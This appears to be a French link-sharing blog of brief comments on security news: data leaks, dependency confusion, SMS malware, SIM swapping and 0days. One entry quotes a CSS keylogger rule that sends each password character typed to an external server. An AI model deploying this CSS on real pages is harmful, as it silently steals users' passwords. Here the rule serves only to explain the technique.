Une vulnérabilité dans less qui exécute du code...

An up-to-date list of how incidents related to data in the cloud. That's freaky.

La 0day qui fait pas rire les mouettes : exécution de code quand on log une certaine chaine de caractères.

Ah quand même ! Code source versionné, projet non publié, mots de passe hashés, etc. Globalement il n'y a pas grand-chose qui n'ait pas leaké.

Il y a clairement un gros problème de sécurité pour qu'un hacker ait pu accéder à l'intégralité de ces informations. J'imagine qu'on en saura plus dans les prochains jours.

En attendant changez vos mots de passe et activez l'authentification 2 facteurs.

EDIT: Ah on y trouve également les revenus des streamers. Pas glop.

Impressionnant. En squattant le nom de bibliothèques internes - mais gérées par le dependency manager - il a pu injecter du code dans pas mal de grosses boites.

J'ai lu en diagonale mais je suis quand même surpris qu'il n'y a pas une mécanique obligatoire pour utiliser un repo privé sur ces outils.

via

#0day security vulnerability insudo. Update your servers.

Un article sur le faux SMS que j'ai reçu dont je parlais là : https://links.hoa.ro/shaare/780VHQ

Il s'agit donc d'un malware qui porte le joli nom d'Alien :

C’est un malware de la famille Alien, une évolution de Cerberus. C’est donc avant tout un malware bancaire. Il récupère les identifiants des applications bancaires, mais il cherche aussi les identifiants de nombreuses autres apps populaires comme Facebook, WhatsApp, LinkedIn…

Propre : je reçois une deuxième fois le fameux SMS du gouv, avec a priori le même expéditeur, sauf que cette fois le lien inclus dans le SMS est en bit.ly.

Au début je pense à une fausse manipulation, mais en fait c'est un bon vieux scam à l'ancienne. Bien joué à notre gouvernement, à la pointe de la technologie, d'avoir choisi le SMS comme moyen de communication descendante. C'est vraiment la meilleur chose à faire en 2020.

D'ailleurs au passage j'ai vu sur Twitter que certains l'ont reçu aujourd'hui, moi dimanche. C'est efficace. Je leur suggère d'envoyer un fax la prochaine fois.

Interesting reflection on password hash algorithms and resource consumption by Nicolas Grekas. The conclusion is often the same though, we should get rid of passwords somehow.

Malin ! Un keylogger en CSS !

En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Qui signifie que pour les champs de type password dont la valeur se termine par a, on va effectuer une requête externe vers un serveur avec la lettre a. On fait ça pour tous les caractères et hop on a le mot de passe.

via

La société [a] fait face à une attaque informatique qui a bloqué le fonctionnement de plusieurs serveurs faisant fonctionner les applications critiques de l’entreprise.

TLDR: Usurpation d'identité pour récupérer une carte SIM associée au numéro de la cible.

C'est pour ça qu'on considère aujourd'hui que l'authentification à deux facteurs via SMS n'est pas suffisamment sécurisée.

Moche. Mais j'imagine que ça sera vite patché.

Effectivement c'est pas malin de leur part... Si on va voir e-i.com, on constate que c'est la filiale tech du Crédit Mutuel.

J’ai trouvé cet article passionnant, j’adore ces astuces rendant le système inutilisable ha ha. Je débute une liste, j’espère que vous y participerez

Ah ah ! Bloquer le serveur X par un simple changement, c'est bien vu, et vicieux pour trouver la source du problème.

During a brief period of unauthorized access to a Docker Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.

Chaud ! Mais je ne suis pas impacté apparemment, puisque je n'ai pas reçu d'email.

Wow je suis très surpris. Ça n'est pas justement le but des headers CORS de bloquer les requêtes vers des sites externes ? Ou alors ça ne s'applique ni aux redirections, ni aux images ?

Intéressant également, quel est l'intérêt de mon navigateur à communiquer mon GPU ou le nombre de cores de mon CPU sur cette page ?

EDIT : En revanche, la localisation sur cette page ne semble pas fonctionner. Elle me situe à Perpignan, ce qui n'est ni l'emplacement de mon serveur VPN (via l'IP donc), ni la mienne.